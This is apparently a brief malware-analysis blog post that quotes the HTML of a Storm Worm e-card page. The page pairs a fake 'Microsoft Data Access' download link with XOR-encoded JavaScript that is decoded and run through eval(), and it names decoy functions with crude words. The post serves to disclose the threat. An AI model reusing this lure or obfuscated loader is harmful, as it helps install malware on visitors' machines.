This time ecard aka storm worm variant defined two function in the encoded java script. Just see the encoded Java Script..
“To view your ecard, you need to have Microsoft Data Access installed on your computer.<br> To obtain a free copy of Microsoft Data Access, please <a href=”/msdataaccess.exe”>click here</a>.<div id=”mydiv”></div><Script Language=’JavaScript’> function xor_str(plain_str, xor_key){ var xored_str = “”; for (var i = 0 ; i < plain_str.length; ++i) xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i)); return xored_str; } function kaspersky(suck,dick){}; function kaspersky2(suck_dick,again){};var plain_str = “\x7d\x50\x57\x50\x57\x2b\x3c\x2f\x7d\x30\x30\x7d\x60\x7d\x33\x38\x2a\x7d\x1c\x2f\x2f\x3c\x24\x75\x74\x66\x50\x57\x2b\x3c\x2f\x7d\x30\x38\x30\x02\x3b\x31\x3c\x3a\x7d\x60\x7d\x6d\x66\x50\x57\x50\x57\x57\x50\x57\x50\x57\x2e\x29\x3c\x2f\x29\x75\x74\x66\x50\x57\x50\x57″; var xored_str = xor_str(plain_str, 93); eval(xored_str); </script>
